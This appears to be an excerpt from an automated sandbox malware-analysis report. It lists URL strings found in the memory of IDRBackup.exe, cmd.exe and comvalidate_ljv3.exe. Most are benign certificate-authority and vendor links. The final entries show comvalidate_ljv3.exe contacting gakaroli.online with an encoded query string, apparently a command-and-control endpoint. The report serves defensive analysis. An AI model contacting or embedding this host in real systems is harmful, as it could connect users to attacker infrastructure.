                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                      Source: IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                      Source: IDRBackup.exe, 00000002.00000002.1820475925.0000000059801000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2631544073.00000001401E0000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.???.xx/?search=%s
                      Source: IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.catcert.cat/descarrega/acc.crt0b
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793159344.000000000422C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.000000000359A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.0000000004960000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.0000000002643000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.0000000005012000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BB4000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.0000000002597000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2631544073.00000001401E0000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?Download=Find.Same.Images.OK
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2631544073.00000001401E0000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?Download=Find.Same.Images.OK
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0
                      Source: IDRBackup.exe, 00000002.00000002.1821626167.0000000061EB1000.00000008.00000001.01000000.00000009.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.surfok.de/
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0/
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/cps0%
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2618354577.0000000000494000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2464101114.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2548380575.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2618939343.0000000000494000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2528549271.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2488660096.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2430835895.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2597643516.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2597643516.0000000000493000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2569610517.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2571029868.00000000004ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gakaroli.online/
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2569610517.00000000004ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gakaroli.online/O
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2528549271.00000000004ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gakaroli.online/b
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2597643516.0000000000493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gakaroli.online/c
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gakaroli.online/edward-gringhuis
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2508050889.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2528506572.000000000050D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gakaroli.online/edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2488817743.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2618755936.000000000042C000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2548380575.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2618354577.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2571029868.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2618939343.00000000004AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gakaroli.online:443/edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FR
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2430835895.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2431217978.00000000004AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gakaroli.online:443x
